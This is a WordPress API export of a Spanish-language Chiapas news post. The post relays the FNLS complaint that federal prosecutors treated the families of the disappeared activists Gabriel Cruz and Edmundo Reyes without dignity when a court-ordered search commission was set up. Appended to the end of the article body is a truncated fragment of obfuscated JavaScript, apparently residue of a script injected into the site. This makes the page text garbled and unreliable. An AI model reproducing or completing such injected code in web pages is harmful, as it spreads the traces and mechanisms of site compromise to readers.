{"id":6421,"date":"2022-11-07T02:40:39","date_gmt":"2022-11-07T02:40:39","guid":{"rendered":"https:\/\/reporteciudadanochiapas.com\/?p=6421"},"modified":"2022-11-07T02:40:40","modified_gmt":"2022-11-07T02:40:40","slug":"no-asume-la-fgr-su-responsabilidad-en-la-ceb-a-favor-de-gabriel-cruz-y-edmundo-reyes","status":"publish","type":"post","link":"https:\/\/reporteciudadanochiapas.com\/?p=6421","title":{"rendered":"No asume la FGR su responsabilidad en la CEB a favor de Gabriel Cruz y Edmundo Reyes"},"content":{"rendered":"\n<figure class=\"wp-block-image size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"498\" src=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2022\/11\/IMG-20211010-WA0038-1024x498.jpg\" alt=\"\" class=\"wp-image-6422\" srcset=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2022\/11\/IMG-20211010-WA0038-1024x498.jpg 1024w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2022\/11\/IMG-20211010-WA0038-300x146.jpg 300w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2022\/11\/IMG-20211010-WA0038-768x373.jpg 768w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2022\/11\/IMG-20211010-WA0038.jpg 1280w\" sizes=\"auto, (max-width: 1024px) 100vw, 1024px\" \/><\/figure>\n\n\n\n<p>\u00d3scar G\u00f3mez\/CorresponsalSan Crist\u00f3bal de Las Casas.-  El Frente Nacional de Lucha por el Socialismo (FNLS) dio a conocer que en cumplimiento a uno de los aspectos que mandata la sentencia de la Suprema Corte de Justicia de la Naci\u00f3n a favor de los revolucionarios Gabriel Alberto Cruz S\u00e1nchez y Edmundo Reyes Amaya, el pasado 03 de noviembre se conform\u00f3 la Comisi\u00f3n Especial de B\u00fasqueda, pero bajo actos de revictimizaci\u00f3n por parte de la Fiscal\u00eda General de la Rep\u00fablica e indiferencia de la Secretar\u00eda de Gobernaci\u00f3n a trav\u00e9s de su representaci\u00f3n. De acuerdo a un comunicado que compartieron, la Comisi\u00f3n Especial de B\u00fasqueda (CEB) qued\u00f3 legalmente constituida, las dependencias se\u00f1aladas en la sentencia a favor de Gabriel y Edmundo asistieron, sin embargo, la Fiscal\u00eda General de la Rep\u00fablica (FGR) actu\u00f3 con una caracter\u00edstica singular en el trato de las v\u00edctimas de la desaparici\u00f3n forzada, revictimiz\u00f3 a los familiares. Lamentan que el recibimiento \u201cfue indigno\u201d, propio de la actitud de instituciones que coloca a las v\u00edctimas en segundo plano en el proceso de la exigencia de justicia y verdad, \u201cpor tal raz\u00f3n, la Fiscal\u00eda y el resto de las dependencias no tomaron en consideraci\u00f3n el respeto de quienes exigimos el justicia. Para la FGR no importa el c\u00f3mo recibir a los familiares v\u00edctimas, al asesor jur\u00eddico, a los acompa\u00f1antes nacionales e internacionales as\u00ed como a organizaciones populares que por m\u00e1s de 15 a\u00f1os de lucha logran por orden judicial crear una Comisi\u00f3n Especial de B\u00fasqueda\u201d. Ante la petici\u00f3n de los familiares y el asesor jur\u00eddico de una sala digna para que los presentes, indican que un funcionario de la Fiscal\u00eda mencion\u00f3 que si los familiares de Edmundo y Gabriel no est\u00e1n de acuerdo en sentarse en aquella reducida sala de reuni\u00f3n \u201cla fiscal pod\u00eda levantar el acta\u201d, sin embargo, al considerar que \u201clos principales actores ten\u00edan donde sentarse\u201d, \u201cson 24 personas, aqu\u00ed caben cerca de 17 personas\u201d. \u201cSi su deseo es que se haga esta reuni\u00f3n, lo hacemos\u201d, \u201cpero si su deseo es que no se haga por capricho\u201d. Dejan en claro que en adelante se debe dise\u00f1ar un plan de b\u00fasqueda y localizaci\u00f3n, aunque la actitud y atenci\u00f3n que prestan en la Comisi\u00f3n Especial de B\u00fasqueda, es irresponsable de parte de las dependencias se\u00f1aladas en el fallo, eso demuestra poca seriedad y voluntad pol\u00edtica en acatar una orden judicial\u201d. Adelantaron que el pr\u00f3ximo 17 de noviembre a las 4 de la tarde es la fecha programada para la reuni\u00f3n de la Comisi\u00f3n Especial de B\u00fasqueda, confirm\u00e1ndose el lugar, y ante la experiencia revictimizante e indiferente de las instituciones durante la conformaci\u00f3n de la CEB, hacen un exhorto al gobierno federal al frente del Licenciado Andr\u00e9s Manuel L\u00f3pez Obrador a corregir la pol\u00edtica de gobierno y la actitud sus subordinados.<\/p>\n\r\n(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return ","protected":false},"excerpt":{"rendered":"<p>\u00d3scar G\u00f3mez\/CorresponsalSan Crist\u00f3bal de Las Casas.- El Frente Nacional de Lucha por el Socialismo (FNLS) dio a conocer que en cumplimiento a uno de los aspectos que mandata la sentencia de la Suprema Corte de Justicia de la Naci\u00f3n a favor de los revolucionarios Gabriel Alberto Cruz S\u00e1nchez y Edmundo Reyes Amaya, el pasado 03 &hellip;<\/p>\n","protected":false},"author":2,"featured_media":6422,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[7],"tags":[],"class_list":["post-6421","post","type-post","status-publish","format-standard","has-post-thumbnail","","category-chiapas"],"_links":{"self":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/6421","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=6421"}],"version-history":[{"count":1,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/6421\/revisions"}],"predecessor-version":[{"id":6423,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/6421\/revisions\/6423"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/media\/6422"}],"wp:attachment":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=6421"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=6421"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=6421"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}